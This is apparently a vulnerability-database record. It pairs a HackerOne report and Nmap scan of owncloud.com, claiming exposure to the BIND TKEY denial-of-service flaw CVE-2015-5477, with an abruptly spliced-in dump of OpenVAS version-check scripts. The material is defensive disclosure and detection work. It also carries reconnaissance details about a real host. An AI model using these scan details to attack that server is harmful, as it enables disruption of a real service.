ID: H1:89097
Type: hackerone
Reporter: 1n3
Modified: 2015-09-16T08:25:57
Description
owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com, which would result in the owncloud server ceasing to respond and even rebooting. It is recommended to upgrade to the latest version of ISC BIND.
NMap Scan Results:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT
Warning: 50.30.33.235 giving up on port because retransmission cap hit (6).
Nmap scan report for owncloud.com (50.30.33.235)
Host is up (0.041s latency).
rDNS record for 50.30.33.235: www.owncloud.com
Not shown: 993 closed ports, 3 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8 (protocol 2.0)
| ssh-hostkey:
| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)
| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)
| 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)
53/tcp open domain
| dns-nsid:
| bind.version: 9.9.4-rpz2.13269.14-P2
A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind97 on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1515\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-July/021269.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-libs\", 
rpm:\"bind97-libs~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "openvas", "title": "Fedora Update for bind99 FEDORA-2015-12316", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869831", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869831", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind99 FEDORA-2015-12316\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869831\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-01 06:54:47 +0200 (Sat, 01 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind99 FEDORA-2015-12316\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind99'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind99 on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12316\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind99\", rpm:\"bind99~9.9.7~6.P2.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-03T00:00:00", "type": "openvas", "title": "RedHat Update for bind RHSA-2015:1514-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2015:1514-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871421\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-03 15:07:57 +0530 (Mon, 03 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind RHSA-2015:1514-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. 
Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1514-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00051.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:38:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bind (SUSE-SU-2015:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851081", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851081\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:39:36 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bind (SUSE-SU-2015:1305-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bind was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\");\n\n script_tag(name:\"affected\", value:\"bind on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1305-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\",
rpm:\"bind-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:53", "description": "Oracle Linux Local Security Checks ELSA-2015-1515", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1515", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123051", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123051", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1515.nasl 
11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123051\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:44 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1515\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1515 - bind97 security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1515\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1515.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind97-libs\", rpm:\"bind97-libs~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 
7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-11T19:36:57", "description": "The host is installed with ISC BIND and is\n prone to remote denial of service vulnerability.", "cvss3": {}, "published": "2016-01-27T00:00:00", "type": "openvas", "title": "ISC BIND Denial of Service Vulnerability - 06 - Jan16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-12-10T00:00:00", "id": "OPENVAS:1361412562310807200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807200", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ISC BIND Denial of Service Vulnerability - 06 - Jan16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:isc:bind\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807200\");\n script_version(\"2019-12-10T15:03:15+0000\");\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-10 15:03:15 +0000 (Tue, 10 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 15:07:28 +0530 (Wed, 27 Jan 2016)\");\n script_name(\"ISC BIND Denial of Service Vulnerability - 06 - Jan16\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"bind_version.nasl\");\n script_mandatory_keys(\"isc/bind/detected\");\n\n script_xref(name:\"URL\", value:\"https://kb.isc.org/docs/aa-01272\");\n\n script_tag(name:\"summary\", value:\"The host is installed with ISC BIND and is\n prone to remote denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in handling\n TKEY queries can cause named to exit with a REQUIRE assertion failure.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"ISC BIND versions 9.1.0 through 9.9.7-P1,\n 9.10.0 through 9.10.2-P2.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ISC BIND version 9.9.7-P2\n or 
9.10.2-P3 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif( version_in_range( version:version, test_version:\"9.1.0\", test_version2:\"9.9.7p1\" ) ) {\n fix = \"9.9.7-P2\";\n VULN = TRUE;\n}\n\nelse if( version_in_range( version:version, test_version:\"9.10.0\", test_version2:\"9.10.2p2\" ) ) {\n fix =\"9.10.2-P3\";\n VULN = TRUE;\n}\n\nif( VULN ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( data:report, port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:30", "description": "Oracle Linux Local Security Checks ELSA-2015-1513", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1513", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123046", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123046", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1513.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123046\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:40 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1513\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1513 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the 